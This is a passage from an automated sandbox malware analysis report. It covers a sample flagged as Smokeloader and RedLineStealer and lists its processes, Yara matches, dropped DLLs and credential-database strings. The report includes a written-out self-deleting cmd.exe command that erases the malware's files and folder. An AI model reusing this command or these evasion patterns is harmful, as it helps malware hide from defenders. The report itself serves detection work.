Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDF8C0	9_2_6CFDF8C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D011990	9_2_6D011990
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF9D810	9_2_6CF9D810
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA59F0	9_2_6CFA59F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD79F0	9_2_6CFD79F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF799D0	9_2_6CF799D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFD99C0	9_2_6CFD99C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D013840	9_2_6D013840
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF51980	9_2_6CF51980
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFBF960	9_2_6CFBF960
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFD960	9_2_6CFFD960
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF5920	9_2_6CFF5920
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01F8F0	9_2_6D01F8F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D09B8F0	9_2_6D09B8F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF41AE0	9_2_6CF41AE0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01FB60	9_2_6D01FB60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D025B90	9_2_6D025B90
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D009BB0	9_2_6D009BB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF7FA10	9_2_6CF7FA10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFE1A10	9_2_6CFE1A10
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF87BF0	9_2_6CF87BF0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D03DA30	9_2_6D03DA30
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF99BA0	9_2_6CF99BA0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C9A50	9_2_6D0C9A50
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF31B80	9_2_6CF31B80
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01DAB0	9_2_6D01DAB0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF8BB20	9_2_6CF8BB20
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF414E0	9_2_6CF414E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D08F510	9_2_6D08F510
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0375D0	9_2_6D0375D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFCD410	9_2_6CFCD410
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC55F0	9_2_6CFC55F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D029430	9_2_6D029430

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\HJJJECFIECBG\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\HJJJECFIECBG\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 020FF807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: String function: 020F8A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D0CD930 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D0C09D0 appears 305 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6CF69B10 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D079F30 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6CF63620 appears 95 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6CF9C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: String function: 6D0CDAE0 appears 72 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640

Sample file is different than original file name gathered from version info

Source: 4.exe, 00000000.00000002.1712269261.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesFilezera2 vs 4.exe
Source: 4.exe	Binary or memory string: OriginalFilenamesFilezera2 vs 4.exe

Uses 32bit PE files

Source: 4.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/35@7/9

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFA0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

9_2_6CFA0300

Source: C:\Users\user\Desktop\4.exe

Code function: 0_2_02EF20CD CreateToolhelp32Snapshot,Module32First,

0_2_02EF20CD

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_0042B20E CoCreateInstance,

6_2_0042B20E

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sdveeeu

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3192
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\F441.tmp

Jump to behavior

Source: 4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.9.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.9.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: F441.exe, 00000006.00000003.2062240344.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2547989323.000000000093D000.00000004.00000020.00020000.00000000.sdmp, AKECBF.9.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 4.exe	ReversingLabs: Detection: 39%
Source: 4.exe	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\4.exe "C:\Users\user\Desktop\4.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sdveeeu C:\Users\user\AppData\Roaming\sdveeeu
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F441.exe C:\Users\user\AppData\Local\Temp\F441.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9EDA.exe C:\Users\user\AppData\Local\Temp\9EDA.exe
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F441.exe C:\Users\user\AppData\Local\Temp\F441.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9EDA.exe C:\Users\user\AppData\Local\Temp\9EDA.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Section loaded: textshaping.dll	Jump to behavior
